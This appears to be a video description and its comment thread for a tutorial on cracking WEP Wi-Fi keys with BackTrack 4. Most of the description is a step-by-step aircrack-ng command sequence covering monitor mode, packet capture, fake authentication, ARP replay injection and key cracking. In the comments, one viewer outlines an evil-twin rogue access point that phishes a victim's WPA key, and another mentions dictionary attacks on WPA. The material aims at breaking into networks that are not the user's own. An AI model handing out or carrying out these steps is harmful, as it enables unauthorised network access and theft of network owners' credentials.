Hacking/Cracking WEP Key with BackTrack 4

This is a simple, yet effective, WEP Cracking tutorial...
you should be able to read the commands quite easily :)

In this video i am using BackTrack 4

The wireless reciever i used was the Linksys WUSB54GC, however i also have an Alfa-AWUS036h which i highly reccomend. This linksys card and the alfa card work straigth out of the box for backtrack.

Commands:

1) ifconfig wlan0 up - (Load my wireless NIC)
2) airmon-ng start wlan0 - (Put my NIC into monitor mode) - Card is now "mon0"
3) airodump-ng mon0 - (scan for wireless AP's(Access Points))
4) airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx -w wep mon0 - (save all traffic from channel 1 and bssid to wep file

5) new terminal: aireplay-ng -1 1 -a xx:xx:xx:xx:xx:xx mon0 - (associate my IP with the AP)
6) new terminal: aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0 - (use ARPreplay attack and gather data)
7) wait for around 50,000 IV's (data)
8) aircrack-ng wep-01.cap

@abdhip a high spec pc and and a good wireless nic would help - if its taking that long then you pc must be too low spec

@tymex5 if you have that problem there can be a few issuse you can be to far from the ap or you could have your tx power up to high or you might not have done the fake auth right hope this helps

@xXVirusAnonXx there is a much more effective way to hack WPA/WPA2...

put your card into a physical and virtual mode, set it to transmit a wifi hotspot, with the same name, channel, higher frequency, and ESSID, that way then the victim connects to his wifi spot, it will connect to our rogue point instead because the frequency is stronger, meaning computers go for the strongest signal 1st, then wen connects, you bring up his router config page asking for the WPA key to be verified, phishing :)

@elevensreflection94 Yes you can hack WPA/WPA2. The most common way In my opinion for WPA's is to hack using a password dictionary containing thousands of possible passwords. Back | Track can do anything. Its the best Linux system I have ever seen for Security Pen.

@92koktong There is a list of "working" internal and usb devices. Alfa I believe is a popular one recommended by Offensive Security.
